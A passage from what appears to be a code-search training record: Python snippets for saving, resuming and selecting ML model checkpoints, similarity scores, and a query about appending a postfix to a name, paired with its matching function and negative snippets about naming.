MIN_SLEEP_INTERVAL\n\n finished_checkpoints = set()\n\n def _add_and_log(path):\n finished_checkpoints.add(path)\n logger.info(\"Found checkpoint: {}\".format(path))\n return path\n\n def _log_and_sleep(sleep_interval):\n logger.info(\n \"Sleep {} seconds while waiting for model_final.pth\".format(sleep_interval)\n )\n time.sleep(sleep_interval)\n return min(sleep_interval * 2, MAX_SLEEP_INTERVAL)\n\n def _get_lightning_checkpoints(path: str):\n return [\n os.path.join(path, x)\n for x in PathManager.ls(path)\n if x.endswith(ModelCheckpoint.FILE_EXTENSION)\n and not x.startswith(ModelCheckpoint.CHECKPOINT_NAME_LAST)\n ]\n\n while True:\n if not PathManager.exists(checkpoint_dir):\n sleep_interval = _log_and_sleep(sleep_interval)\n continue\n\n checkpoint_paths = DetectionCheckpointer(\n None, save_dir=checkpoint_dir\n ).get_all_checkpoint_files()\n checkpoint_paths.extend(_get_lightning_checkpoints(checkpoint_dir))\n\n final_model_path = None\n periodic_checkpoints = []\n\n for path in sorted(checkpoint_paths):\n if path.endswith(\"model_final.pth\") or path.endswith(\"model_final.ckpt\"):\n final_model_path = path\n continue\n\n if path.endswith(ModelCheckpoint.FILE_EXTENSION):\n # Lightning checkpoint\n model_iter = int(\n re.findall(\n r\"(?<=step=)\\d+(?={})\".format(ModelCheckpoint.FILE_EXTENSION),\n path,\n )[0]\n )\n else:\n model_iter = int(re.findall(r\"(?<=model_)\\d+(?=\\.pth)\", path)[0])\n periodic_checkpoints.append((path, model_iter))\n\n periodic_checkpoints = [\n pc for pc in periodic_checkpoints if pc[0] not in finished_checkpoints\n ]\n periodic_checkpoints = sorted(periodic_checkpoints, key=lambda x: x[1])\n for pc in periodic_checkpoints:\n yield _add_and_log(pc[0])\n sleep_interval = MIN_SLEEP_INTERVAL\n\n if final_model_path is None:\n sleep_interval = _log_and_sleep(sleep_interval)\n else:\n yield _add_and_log(final_model_path)\n break", "def make_checkpoint(self, f_id, files):\n logging.info(\"Saving a checkpoint of the current model...\")\n\n # NOTE: model may be an instance of apex.parallel.distributed.DistributedDataParallel\n # in this case, model.module is the actual pytorch module\n model_to_save = \\\n self.model.module \\\n if hasattr(self.model, 'module') \\\n else self.model\n\n # Save model weights, optimizer state, AMP master parameters and\n # the list of .hdf5 that are yet to be used (e.g. 
for resuming pre-training)\n if self.resume_step < 0 or not self.phase2:\n output_save_file = os.path.join(\n self.output_directory,\n f\"ckpt_{self.global_step}.pt\")\n else:\n output_save_file = os.path.join(\n self.output_directory,\n f\"ckpt_{self.global_step + self.phase1_end_step}.pt\")\n torch.save(\n {\n 'model': model_to_save.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'master params': list(amp.master_params(self.optimizer)),\n 'files': [f_id] + files\n },\n output_save_file\n )\n\n # Keep only a specific number of 'best' checkpoints\n self.most_recent_ckpts_paths.append(output_save_file)\n if len(self.most_recent_ckpts_paths) > self.num_checkpoints_to_keep:\n checkpoint_to_remove = \\\n self.most_recent_ckpts_paths.pop(0)\n os.remove(checkpoint_to_remove)", "def _generate_validation_fold(self):\n\n for offset in range(self.nb_folds):\n # Load all the data from cache (do this to save memory)\n with open(self.data_cache_path_str + \"data_cache.pkl\", \"rb\") as f:\n data_df, target_df = pickle.load(f)\n\n # Generate train and test sets\n data_dates_lst = data_df[\"date\"].drop_duplicates().sort_values().tolist()\n train_start_day = len(data_dates_lst) - ((self.nb_folds - offset) * self.test_nb_days + self.train_nb_days)\n train_end_day = train_start_day + self.train_nb_days\n test_start_day = train_end_day\n test_end_day = test_start_day + self.test_nb_days\n\n train_dates_lst = data_dates_lst[train_start_day:train_end_day]\n test_dates_lst = data_dates_lst[test_start_day:test_end_day]\n\n # Generate train and test labels\n training_set_df = data_df.loc[data_df[\"date\"].isin(train_dates_lst)].reset_index(drop = True)\n testing_set_df = data_df.loc[data_df[\"date\"].isin(test_dates_lst)].reset_index(drop = True)\n new_target_df = target_df.loc[data_df[\"date\"].isin(train_dates_lst)].reset_index(drop = True)\n truth_df = target_df.loc[data_df[\"date\"].isin(test_dates_lst)].reset_index(drop = True)\n\n # Reduce memory usage\n del data_df, target_df\n gc.collect()\n\n # Return result\n yield (training_set_df, testing_set_df, new_target_df, truth_df)", "def checkpoint_period_get(self):\n raise Exception(\"TODO\")", "def backtrack(self):\n prediction = list()\n\n # import ipdb\n # ipdb.set_trace()\n # Initialize for length of top-k sequences\n length = [[self.max_unroll] * self.beam_size for _ in range(self.batch_size)]\n\n # Last step output of the beam are not sorted => sort here!\n # Size not changed [batch size, beam_size]\n top_k_score, top_k_idx = self.scores[-1].topk(self.beam_size, dim=1)\n\n # Initialize sequence scores\n top_k_score = top_k_score.clone()\n\n n_eos_in_batch = [0] * self.batch_size\n\n # Initialize Back-pointer from the last step\n # Add self.position_idx for indexing variable with batch x beam as the first dimension\n # [batch x beam]\n back_pointer = (top_k_idx + self.batch_position.unsqueeze(1)).view(-1)\n\n for t in reversed(range(self.max_unroll)):\n # Reorder variables with the Back-pointer\n # [batch x beam]\n token_id = self.token_ids[t].index_select(0, back_pointer)\n\n # Reorder the Back-pointer\n # [batch x beam]\n back_pointer = self.back_pointers[t].index_select(0, back_pointer)\n\n # Indices of ended sequences\n # [< batch x beam]\n eos_indices = self.token_ids[t].data.eq(EOS_ID).nonzero()\n\n # For each batch, every time we see an EOS in the backtracking process,\n # If not all sequences are ended\n # lowest scored survived sequence <- detected ended sequence\n # if all sequences are ended\n # lowest scored ended sequence <- 
detected ended sequence\n if eos_indices.dim() > 0:\n # Loop over all EOS at current step\n for i in range(eos_indices.size(0) - 1, -1, -1):\n # absolute index of detected ended sequence\n eos_idx = eos_indices[i, 0].item()\n\n # At which batch EOS is located\n batch_idx = eos_idx // self.beam_size\n batch_start_idx = batch_idx * self.beam_size\n\n # if n_eos_in_batch[batch_idx] > self.beam_size:\n\n # Index of sequence with lowest score\n _n_eos_in_batch = n_eos_in_batch[batch_idx] % self.beam_size\n beam_idx_to_be_replaced = self.beam_size - _n_eos_in_batch - 1\n idx_to_be_replaced = batch_start_idx + beam_idx_to_be_replaced\n\n # Replace old information with new sequence information\n back_pointer[idx_to_be_replaced] = self.back_pointers[t][eos_idx].item()\n token_id[idx_to_be_replaced] = self.token_ids[t][eos_idx].item()\n top_k_score[batch_idx,\n beam_idx_to_be_replaced] = self.scores[t].view(-1)[eos_idx].item()\n length[batch_idx][beam_idx_to_be_replaced] = t + 1\n\n n_eos_in_batch[batch_idx] += 1\n\n # max_unroll * [batch x beam]\n prediction.append(token_id)\n\n # Sort and re-order again as the added ended sequences may change the order\n # [batch, beam]\n top_k_score, top_k_idx = top_k_score.topk(self.beam_size, dim=1)\n final_score = top_k_score.data\n\n for batch_idx in range(self.batch_size):\n length[batch_idx] = [length[batch_idx][beam_idx.item()]\n for beam_idx in top_k_idx[batch_idx]]\n\n # [batch x beam]\n top_k_idx = (top_k_idx + self.batch_position.unsqueeze(1)).view(-1)\n\n # Reverse the sequences and re-order at the same time\n # It is reversed because the backtracking happens in the reverse order\n # [batch, beam]\n\n prediction = [step.index_select(0, top_k_idx).view(\n self.batch_size, self.beam_size) for step in reversed(prediction)]\n\n # [batch, beam, max_unroll]\n prediction = torch.stack(prediction, 2)\n\n return prediction, final_score, length", "def train_step(self) -> Tuple[Dict[str, Any], Dict[str, Any], bool]:\n assert self.episode_per_test is not None\n assert self.train_collector is not None\n stop_fn_flag = False\n if self.train_fn:\n self.train_fn(self.epoch, self.env_step)\n result = self.train_collector.collect(\n n_step=self.step_per_collect, n_episode=self.episode_per_collect\n )\n if result[\"n/ep\"] > 0 and self.reward_metric:\n rew = self.reward_metric(result[\"rews\"])\n result.update(rews=rew, rew=rew.mean(), rew_std=rew.std())\n self.env_step += int(result[\"n/st\"])\n self.logger.log_train_data(result, self.env_step)\n self.last_rew = result[\"rew\"] if result[\"n/ep\"] > 0 else self.last_rew\n self.last_len = result[\"len\"] if result[\"n/ep\"] > 0 else self.last_len\n data = {\n \"env_step\": str(self.env_step),\n \"rew\": f\"{self.last_rew:.2f}\",\n \"len\": str(int(self.last_len)),\n \"n/ep\": str(int(result[\"n/ep\"])),\n \"n/st\": str(int(result[\"n/st\"])),\n }\n if result[\"n/ep\"] > 0:\n if self.test_in_train and self.stop_fn and self.stop_fn(result[\"rew\"]):\n assert self.test_collector is not None\n test_result = test_episode(\n self.policy, self.test_collector, self.test_fn, self.epoch,\n self.episode_per_test, self.logger, self.env_step\n )\n if self.stop_fn(test_result[\"rew\"]):\n stop_fn_flag = True\n self.best_reward = test_result[\"rew\"]\n self.best_reward_std = test_result[\"rew_std\"]\n else:\n self.policy.train()\n\n return data, result, stop_fn_flag", "def restore_state(model, optimizer, latest_snapshot):\n\n checkpoint = torch.load(latest_snapshot,\n map_location=lambda storage, loc: 
storage.cuda(args[\"local_rank\"]))\n\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n return checkpoint['seen_images'], checkpoint['epochs']", "def snapshot_state(self) -> Mapping[str, jnp.ndarray]:\n snapshot_state = {}\n if not self.CHECKPOINT_ATTRS and not self.NON_BROADCAST_CHECKPOINT_ATTRS:\n logging.warning(\n \"Your experiment's self.CHECKPOINT_ATTRS and \"\n \"self.NON_BROADCAST_CHECKPOINT_ATTRS are empty. Your job will not \"\n \"checkpoint any state or parameters. See \"\n \"learning/deepmind/research/jax/pipeline/examples/imagenet/\"\n \"experiment.py for an example of specifying values to checkpoint.\")\n for attr_name, chk_name in self.CHECKPOINT_ATTRS.items():\n snapshot_state[chk_name] = utils.get_first(getattr(self, attr_name))\n for attr_name, chk_name in self.NON_BROADCAST_CHECKPOINT_ATTRS.items():\n snapshot_state[chk_name] = getattr(self, attr_name)\n return snapshot_state", "def _get_latest_checkpoint_number(cls, checkpoints_dir):\n nums = cls._checkpoint_numbers(checkpoints_dir)\n if len(nums) == 0:\n return None\n else:\n return max(nums)", "def last_checkpoint(prefixes, snapshot_interval=None, max_iter=None,\n snapshot_ext=\".solverstate\", weights_ext=\".caffemodel\"):\n if not isinstance(prefixes, list):\n prefixes = [prefixes]\n if not snapshot_interval:\n snapshot_interval = 1\n model_iter_pattern = None\n solver_iter_pattern = None\n if snapshot_ext:\n solver_iter_pattern = re.compile(r'iter_(?P<ITER>\\d+){}$'.format(re.escape(snapshot_ext)))\n if weights_ext:\n model_iter_pattern = re.compile(r'iter_(?P<ITER>\\d+){}$'.format(re.escape(weights_ext)))\n snapshot = ''\n iterations = -1\n model_iterations = 0\n weights = ''\n found_solver = False\n found_model = False\n for prefix in prefixes:\n path = op.dirname(prefix)\n base = op.basename(prefix)\n if not op.isdir(path):\n if path:\n logging.info('last_checkpoint ignored invalid path: \"{}\"'.format(path))\n continue\n\n if iterations >= 0:\n found_solver = True\n if model_iterations:\n found_model = True\n if found_solver and found_model:\n break\n solver = model = None\n for fname in os.listdir(path):\n if not fname.startswith(base):\n continue\n if solver_iter_pattern:\n solver = re.search(solver_iter_pattern, fname) if not found_solver else None\n if model_iter_pattern:\n model = re.search(model_iter_pattern, fname) if not found_model else None\n if solver:\n iters = int(solver.group('ITER'))\n if iters == max_iter:\n found_solver = True\n if not found_solver and (iters % snapshot_interval != 0 or iters > max_iter):\n logging.info('Ignore snapshot interval: {} snapshot: {} max_iter: {}'.format(\n snapshot_interval, fname, max_iter))\n elif iters > iterations or found_solver:\n snapshot = op.join(path, fname)\n iterations = iters\n if model:\n iters = int(model.group('ITER'))\n if iters == max_iter:\n found_model = True\n if not found_model and (iters % snapshot_interval != 0 or iters > max_iter):\n logging.info('Ignore snapshot interval: {} snapshot: {} max_iter: {}'.format(\n snapshot_interval, fname, max_iter))\n elif iters > model_iterations or found_model:\n weights = op.join(path, fname)\n model_iterations = iters\n\n if iterations < 0:\n iterations = 0\n return snapshot, iterations, weights", "def restore_checkpoint(self, subtree_root: 'Node') -> str:\n envscore, done = 0, False\n env, obs, infos = self.reset()\n cmd_history = subtree_root.cmd_history()\n if len(cmd_history) > 0:\n for index, cmd in cmd_history:\n obs, envscore, done, infos = 
self.step(index, cmd)\n self.current.extra_info = subtree_root.extra_info.copy()\n return obs, envscore, done, infos", "def load_checkpoint(cfg, args):\n checkpoint_iteration = args.checkpoint\n bucket = connect_to_bucket(args.bucket)\n # load actual checkpoint\n if not os.path.isdir(cfg.OUTPUT_DIR):\n os.mkdir(cfg.OUTPUT_DIR)\n blob = bucket.blob(cfg.OUTPUT_DIR + \"/model_\" + str(checkpoint_iteration) + \".pth\")\n blob.download_to_filename(cfg.OUTPUT_DIR + \"/model_\" + str(checkpoint_iteration) + \".pth\")\n if args.resume:\n # also write last checkpoint file for when --resume statement, model gets checkpoint name from this file\n with open(cfg.OUTPUT_DIR + \"/last_checkpoint\", \"w\") as file:\n file.write(\"model_\" + str(checkpoint_iteration) + \".pth\")\n # return statement not clean, but useful for inference code\n return checkpoint_iteration, bucket", "def restore_best_checkpoint(session, ckpt_dir):\n try:\n evals_file = os.path.join(ckpt_dir, EVALUATIONS_FILE)\n f = open(evals_file)\n evals = json.load(f)\n best_ckpt = max(evals, key=lambda e: e['accuracy'])\n\n except Exception as e:\n raise Exception('Error reading evaluations summary file: {}'.format(e))\n\n ckpt_file = \"{}-{}\".format(BEST_MODEL_PREFIX, best_ckpt['iteration'])\n saver = tf.train.Saver()\n saver.restore(session, os.path.join(ckpt_dir, ckpt_file))", "def SelectTestCheckpoint(\n log_dir: Path,\n) -> Tuple[epoch_pb2.Epoch, checkpoint_pb2.Checkpoint]:\n best_f1 = -1\n best_epoch_num = None\n for path in (log_dir / \"epochs\").iterdir():\n if path.name.endswith(\".EpochList.pbtxt\"):\n epoch = pbutil.FromFile(path, epoch_pb2.EpochList())\n f1 = epoch.epoch[0].val_results.mean_f1\n epoch_num = epoch.epoch[0].epoch_num\n if f1 >= best_f1:\n best_f1 = f1\n best_epoch_num = epoch_num\n epoch = pbutil.FromFile(\n log_dir / \"epochs\" / f\"{best_epoch_num:03d}.EpochList.pbtxt\",\n epoch_pb2.EpochList(),\n )\n checkpoint = pbutil.FromFile(\n log_dir / \"checkpoints\" / f\"{best_epoch_num:03d}.Checkpoint.pb\",\n checkpoint_pb2.Checkpoint(),\n )\n logging.info(\n \"Selected best checkpoint %d with val F1 score %.3f\",\n epoch.epoch[0].epoch_num,\n epoch.epoch[0].val_results.mean_f1,\n )\n return epoch.epoch[0], checkpoint", "def _checkpoint_numbers(cls, checkpoints_dir):\n dirs = [d for d in listdir(checkpoints_dir) if d.endswith('.checkpoint')]\n return sorted([int(d[:-11]) for d in dirs])", "def evaluate_and_export(self):\n latest_ckpt_path = self._estimator.latest_checkpoint()\n if not latest_ckpt_path:\n self._log_err_msg('Estimator is not trained yet. Will start an '\n 'evaluation when a checkpoint is ready.')\n return None\n\n if latest_ckpt_path == self._previous_ckpt_path:\n self._log_err_msg(\n 'No new checkpoint ready for evaluation. Skip the current '\n 'evaluation pass as evaluation results are expected to be same '\n 'for the same checkpoint.')\n return None\n eval_result = self._estimator.evaluate(\n input_fn=self._eval_spec.input_fn,\n steps=self._eval_spec.steps,\n name=self._eval_spec.name,\n checkpoint_path=latest_ckpt_path,\n hooks=self._eval_spec.hooks)\n\n if not eval_result:\n raise RuntimeError(\n 'Internal error: `Estimator.evaluate` should never return empty '\n 'result.')\n if not isinstance(eval_result, dict):\n raise TypeError(\n '`Estimator.evaluate` should return dict. Given {}.'.format(\n type(eval_result)))\n if ops.GraphKeys.GLOBAL_STEP not in eval_result:\n raise RuntimeError(\n 'Internal error: `Estimator.evaluate` result should have '\n '`global_step` in result. 
Given {}'.format(eval_result))\n\n self._export_eval_result(eval_result, latest_ckpt_path)\n\n self._last_warning_time = 0\n self._previous_ckpt_path = latest_ckpt_path\n return eval_result", "def load_states(self, checkpoint):\n raise NotImplementedError()", "def save_checkpoint(self) -> Dict[str, Union[Dict[str, torch.Tensor], dict]]:\n if isinstance(self.model, nn.DataParallel) or isinstance(self.model, nn.parallel.DistributedDataParallel):\n model = self.model.module.state_dict()\n else:\n model = self.model.state_dict()\n\n checkpoint = {\n \"model_state_dict\": deepcopy(model),\n \"optimizer_state_dict\": deepcopy(self.optimizer.state_dict()),\n }\n return checkpoint", "def on_save_checkpoint(self):\n callback_states = {}\n for callback in self.callbacks:\n callback_class = type(callback)\n state = callback.on_save_checkpoint(self, self.get_model())\n if state:\n callback_states[callback_class] = state\n return callback_states", "def checkCheckpoint(self):\n if self.maze.checkpoints[self.checkpoint].checkCollision(self.pos):\n self.checkpoint +=1\n if(self.checkpoint >= self.maze.checkpointsPerLap):\n if(self.maze.mazeType == \"circular\"):\n self.checkpoint = 0\n self.laps +=1\n elif(self.maze.mazeType == \"linear\"):\n self.checkpoint = 0\n self.laps +=1\n self.resetPos()\n self.targetCheckpointPos = self.maze.checkpoints[self.checkpoint].getMidInt()", "def get_callbacks(args):\n\n # Model checkpoint\n model_checkpoint_clbk = pl.callbacks.model_checkpoint.ModelCheckpoint(\n dirpath=None,\n filename='best',\n monitor=args.metric_monitor,\n save_last=True,\n mode='max',\n )\n model_checkpoint_clbk.CHECKPOINT_NAME_LAST = '{epoch}-{step}'\n callbacks = [\n model_checkpoint_clbk,\n DecayLR(lr_init=args.lr),\n ]\n return callbacks", "def get_checkpoint_list(dirname):\n all_ckpts = [\n int(_fn.strip('weights_epoch.pt'))\n for _fn in os.listdir(dirname) if _fn.endswith('.pt')\n ]\n return all_ckpts", "def get_checkpoint_list_by_student_id(cls, student_id):\n return cls.create_checkpoint_list_by_student_id(student_id)", "def reload_checkpoint(self):\n checkpoint_path = os.path.join(self.params.dump_path, 'checkpoint.pth')\n if not os.path.isfile(checkpoint_path):\n if self.params.reload_checkpoint == '':\n return\n else:\n checkpoint_path = self.params.reload_checkpoint\n assert os.path.isfile(checkpoint_path)\n logger.warning(\"Reloading checkpoint from %s ...\" % checkpoint_path)\n data = torch.load(checkpoint_path, map_location='cpu')\n\n # reload model parameters\n for name in self.MODEL_NAMES:\n getattr(self, name).load_state_dict(data[name])\n\n # reload optimizers\n for name in self.optimizers.keys():\n if False: # AMP checkpoint reloading is buggy, we cannot do that - TODO: fix - https://github.com/NVIDIA/apex/issues/250\n logger.warning(\"Reloading checkpoint optimizer %s ...\" % name)\n else: # instead, we only reload current iterations / learning rates\n logger.warning(\"Not reloading checkpoint optimizer %s.\" % name)\n for group_id, param_group in enumerate(self.optimizers[name].param_groups):\n if 'num_updates' not in param_group:\n logger.warning(\"No 'num_updates' for optimizer %s.\" % name)\n continue\n logger.warning(\"Reloading 'num_updates' and 'lr' for optimizer %s.\" % name)\n param_group['num_updates'] = data['%s_optimizer' % name]['param_groups'][group_id]['num_updates']\n param_group['lr'] = self.optimizers[name].get_lr_for_step(param_group['num_updates'])\n\n # reload main metrics\n self.epoch = data['epoch'] + 1\n self.n_total_iter = data['n_total_iter']\n 
self.best_metrics = data['best_metrics']\n self.best_stopping_criterion = data['best_stopping_criterion']\n logger.warning(\"Checkpoint reloaded. Resuming at epoch %i / iteration %i ...\" % (self.epoch, self.n_total_iter))", "def checkpoint(name, first = False):\n global DEBUG\n if DEBUG:\n if name != 'first':\n print 'checkpoint %15s: %f' % ((time.time() - SCRIPT_START) if not first else name, (time.time() - checkpoint.start))\n checkpoint.start = time.time()", "async def get_checkpoint_async(self, partition_id):", "def restore(self, checkpoint):\n raise NotImplementedError", "def restore_checkpoint(model, checkpoint_dir, cuda=False, force=False, pretrain=False):\n try:\n cp_files = [\n file_\n for file_ in os.listdir(checkpoint_dir)\n if file_.startswith(\"epoch=\") and file_.endswith(\".checkpoint.pth.tar\")\n ]\n except FileNotFoundError:\n cp_files = None\n os.makedirs(checkpoint_dir)\n if not cp_files:\n print(\"No saved model parameters found\")\n if force:\n raise Exception(\"Checkpoint not found\")\n else:\n return model, 0, []\n\n # Find latest epoch\n for i in itertools.count(1):\n if \"epoch={}.checkpoint.pth.tar\".format(i) in cp_files:\n epoch = i\n else:\n break\n\n if not force:\n print(\n \"Which epoch to load from? Choose in range [0, {}].\".format(epoch),\n \"Enter 0 to train from scratch.\",\n )\n print(\">> \", end=\"\")\n inp_epoch = int(input())\n if inp_epoch not in range(epoch + 1):\n raise Exception(\"Invalid epoch number\")\n if inp_epoch == 0:\n print(\"Checkpoint not loaded\")\n clear_checkpoint(checkpoint_dir)\n return model, 0, []\n else:\n print(\"Which epoch to load from? Choose in range [1, {}].\".format(epoch))\n inp_epoch = int(input())\n if inp_epoch not in range(1, epoch + 1):\n raise Exception(\"Invalid epoch number\")\n\n filename = os.path.join(\n checkpoint_dir, \"epoch={}.checkpoint.pth.tar\".format(inp_epoch)\n )\n\n print(\"Loading from checkpoint {}?\".format(filename))\n\n if cuda:\n checkpoint = torch.load(filename)\n else:\n # Load GPU model on CPU\n checkpoint = torch.load(filename, map_location=lambda storage, loc: storage)\n\n try:\n start_epoch = checkpoint[\"epoch\"]\n stats = checkpoint[\"stats\"]\n if pretrain:\n model.load_state_dict(checkpoint[\"state_dict\"], strict=False)\n else:\n model.load_state_dict(checkpoint[\"state_dict\"])\n print(\n \"=> Successfully restored checkpoint (trained for {} epochs)\".format(\n checkpoint[\"epoch\"]\n )\n )\n except:\n print(\"=> Checkpoint not successfully restored\")\n raise\n\n return model, inp_epoch, stats", "def resume(self) -> int:\n last_epoch = -1\n latest_file_path = self._fetch_latest_checkpt()\n if latest_file_path and os.path.exists(latest_file_path):\n self.load_params(latest_file_path)\n _, self.checkpt_dir, filename = latest_file_path.rsplit(os.path.sep, 2)\n # fetch the last epoch from the filename\n last_epoch = int(filename.split(\"_\", 1)[0])\n return last_epoch + 1", "def get_history(self):\n if self.validation:\n return self.iterations, (self.losses, self.valid_losses), \\\n (self.weights), (self.misclass_rate, self.valid_misclass_rate)\n return self.iterations, self.losses, self.weights, self.misclass_rate", "def _resume_checkpoint(self, resume_path):\n self.logger.info(\"Loading checkpoint: {} ...\".format(resume_path))\n checkpoint = torch.load(resume_path)\n self.start_epoch = checkpoint['epoch'] + 1\n self.mnt_best = checkpoint['monitor_best']\n\n # load model params from checkpoint.\n if checkpoint['config']['name'] != self.config['name']:\n self.logger.warning(\n 
'Warning: Architecture configuration given in config file is different from that of checkpoint. ' + \\\n 'This may yield an exception while state_dict is being loaded.')\n self.model.load_state_dict(checkpoint['model_state_dict'])\n\n # load optimizer state from checkpoint only when optimizer type is not changed. \n if checkpoint['config']['optimizer']['type'] != self.config['optimizer']['type']:\n self.logger.warning('Warning: Optimizer type given in config file is different from that of checkpoint. ' + \\\n 'Optimizer parameters not being resumed.')\n self.optimizer.load_state_dict(checkpoint['model_optimizer'])\n\n # load scheduler state from checkpoint only when scheduler type is not changed\n if checkpoint['config']['scheduler']['type'] != self.config['scheduler']['type']:\n self.logger.warning('Warning: Scheduler type given in config file is different from that of checkpoint. ' + \\\n 'Scheduler parameters not being resumed.')\n self.scheduler.load_state_dict(checkpoint['model_scheduler'])\n\n self.train_logger = checkpoint['logger']\n self.logger.info(\"Checkpoint '{}' (epoch {}) loaded\".format(resume_path, self.start_epoch))" ]
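The checkpoint snippets above all share one save/resume pattern; a minimal sketch follows, assuming a PyTorch model and optimizer (the filename and variable names are illustrative, not taken from any snippet):

import torch

# Save: bundle the epoch, model weights and optimizer state into one file (names are assumptions)
state = {
    'epoch': epoch,
    'model_state_dict': model.state_dict(),
    'optimizer_state_dict': optimizer.state_dict(),
}
torch.save(state, 'checkpoint.pth')

# Resume: load on CPU first, restore both state dicts, continue from the next epoch
ckpt = torch.load('checkpoint.pth', map_location='cpu')
model.load_state_dict(ckpt['model_state_dict'])
optimizer.load_state_dict(ckpt['optimizer_state_dict'])
start_epoch = ckpt['epoch'] + 1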
[ "0.744063", "0.70907867", "0.7052293", "0.69212705", "0.68812984", "0.664399", "0.66409785", "0.6579985", "0.6512506", "0.65115094", "0.65036887", "0.63288766", "0.624046", "0.6220209", "0.62004256", "0.61839545", "0.61744016", "0.6170368", "0.6168887", "0.61377853", "0.6108591", "0.61012584", "0.596558", "0.5936436", "0.59361285", "0.59343374", "0.59013444", "0.5896348", "0.58896816", "0.5888293", "0.5848969", "0.57956976", "0.5781577", "0.5769159", "0.57523", "0.5749514", "0.57310784", "0.5726021", "0.5723496", "0.5716103", "0.56912565", "0.5683027", "0.56829864", "0.5655023", "0.564936", "0.56402713", "0.5638397", "0.5638236", "0.5632487", "0.5603866", "0.5600081", "0.5599858", "0.55968153", "0.55892336", "0.55875397", "0.55712086", "0.5568932", "0.556411", "0.5561662", "0.5560189", "0.5558631", "0.5558197", "0.5552293", "0.554177", "0.55391353", "0.5534758", "0.55247605", "0.5518062", "0.55154383", "0.5492035", "0.54775906", "0.54637873", "0.54612595", "0.5460527", "0.54575354", "0.5453942", "0.54407024", "0.54357314", "0.542979", "0.54278344", "0.54218477", "0.5419997", "0.54196596", "0.5415183", "0.54111385", "0.5395826", "0.53910935", "0.538909", "0.5387719", "0.53870726", "0.53851396", "0.53827757", "0.5377471", "0.5373975", "0.53679204", "0.5342753", "0.53400934", "0.5339644", "0.5333741", "0.53321123" ]
0.7678584
0
append name with postfix
def append_name(name, postfix): if name is None: ret = None elif name == '': ret = postfix else: ret = '%s_%s' % (name, postfix) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_name(name):\r\n\r\n\r\n return name + \"-apple\"", "def add_name(self, node):\n if 'name' in self.options:\n name = nodes.fully_normalize_name(self.options.pop('name'))\n if 'name' in node:\n del(node['name'])\n node['names'].append(name)\n self.state.document.note_explicit_target(node, node)", "def add_suffix(name: str, suffix: str):\n return f'{name}_{suffix}'", "def append_to_path(path, name):\n if path[-1] == '/' or path[-1] == ':':\n return path + name\n else:\n return str(path) + str('/') + str(name)", "def create_policy_name(self, role_name, postfix):\n return '{}-{}-{}'.format(role_name, 'policy', postfix)", "def _add_name(self, msg, name):\n try:\n names = self.get_local(msg, \"names\")\n except KeyError:\n names = set()\n names.add(name)\n self.set_local(msg, \"names\", names)", "def addAlias(self, name):\r\n self._otherNames.append(name.strip().lower())", "def __add__(self, new_name: Tuple[str, str]) -> None:\n self.formal_names.update({new_name[0]: new_name[1]})", "def get_name(self, old_name):\n if old_name not in self.record:\n self.record[old_name] = [self.PLACEHOLDER]\n suffix = \"\"\n else:\n self.record[old_name].append(self.PLACEHOLDER)\n suffix = f\"{len(self.record[old_name]) - 1}\"\n\n new_name = f\"{old_name}{suffix}\"\n self.topo_order.append(new_name)\n\n return new_name", "def record_name(self, name: str) -> None:\n if self.is_top_level():\n self._toplevel_names.append(name)", "def add_proper_name (w,lx):\n if ('A' <= w[0] and w[0] <= 'Z'):\n lx.add(w,'P')\n return ''\n else:\n return (w + \" isn't a proper name\")", "def add_proper_name (w,lx):\n if ('A' <= w[0] and w[0] <= 'Z'):\n lx.add(w,'P')\n return ''\n else:\n return (w + \" isn't a proper name\")", "def add_prefix(self, name, uri):\n\n self.prefixes.append('%s: %s' % (name, uri))", "def new_name(self,new_name):\n self.name = new_name", "def _name (self, incAggr = True):\n\t\taggrName = \"@%s\" % self.aggr if self.aggr and incAggr else \"\"\n\t\ttag = \".%s\" % self.tag if self.tag != \"notag\" else \"\"\n\t\treturn \"%s%s%s\" % (self.id, tag, aggrName)", "def updateName(g):\n try:\n n = int(g.group(2))\n except TypeError:\n n = 0\n\n return \"%s-%d\" % (g.group(1), n + 1)", "def add_name(self, name):\n self.name = name", "def namePush(ctxt, value):\n if ctxt is None: ctxt__o = None\n else: ctxt__o = ctxt._o\n ret = libxml2mod.namePush(ctxt__o, value)\n return ret", "def named_back_reference(name:str) -> str:\n # TODO error handling \n return f\"\\\\k<{name}>\"", "def generate_name(self, name):\n return \"{}/{}.{}\".format(self.name, self._layer_counter, name)", "def format_name(self):\n\t\tself.full_name = self.first + \" \" + self.last", "def fullname(self, name):\n f, l = name.split(' ')\n self.first = f\n self.last = l", "def add_nickname(self, nickname):\n if 'Nicknames' not in self.properties:\n self.properties['Nicknames'] = []\n if (len(self.properties['Nicknames']) == 1 and self.properties['Nicknames'][0].startswith('Temp')):\n self.properties['Nicknames'][0] = nickname.title()\n else:\n self.properties['Nicknames'].append(nickname.title())", "def print_name(nome, sobrenome):\r\n return nome + \" \" + sobrenome", "def _generate_node_name(\n self,\n prefix,\n middle,\n suffix,\n ):\n name = ''\n if prefix:\n name += prefix + '-'\n name += middle\n if suffix:\n name += '-' + suffix\n\n return name", "def increment_name(base, existing):\r\n if not base in existing:\r\n return base\r\n n = 1\r\n make_name = lambda: base + str(n)\r\n while make_name() in existing:\r\n n += 1\r\n return 
make_name()", "def append_service_to_name(self, data, **kwargs):\n\n data['name'] = f'{data.get(\"name\").upper()}_SERVICE'\n return data", "def add_suffix(word, suffix):\n suffix, sep, rest = suffix.partition(' ')\n expanded = _add_suffix(word, suffix)\n return expanded + sep + rest", "def _Name(self, t):\n self.write(t.id)", "def _prefix_name(self, name: str) -> str:\n name_to_check: str = name.split(\".\", 1)[0]\n if self.prefix == \"auto\":\n return f\"-{name}\" if len(name_to_check) <= 1 else f\"--{name}\"\n return f\"{self.prefix}{name}\"", "def add_name(self, name: str) -> None:\n self._names.append(name)", "def updateName( user, login, name, sid, postfix=0 ):\n try:\n print \"Trying to update name with login_name=\", login\n user.first_name = name\n newlogin = login\n #strip the username of any special characters, including spaces\n \n if postfix:\n newlogin=\"%s%03d\" % ( login, postfix )\n user.username = newlogin\n user.save()\n except Exception, e:\n print \"Couldn't update name, rolling back\", e\n transaction.savepoint_rollback(sid)\n updateName( user, login, name, sid, postfix+1 )", "def prefix_id(self, name):\n if \":\" in name: return name\n return self.prefix + \":\" + name", "def addDefName( self, name ):\n nm= self.fullNameFor( name )\n if nm is None: return None\n if nm[-3:] == 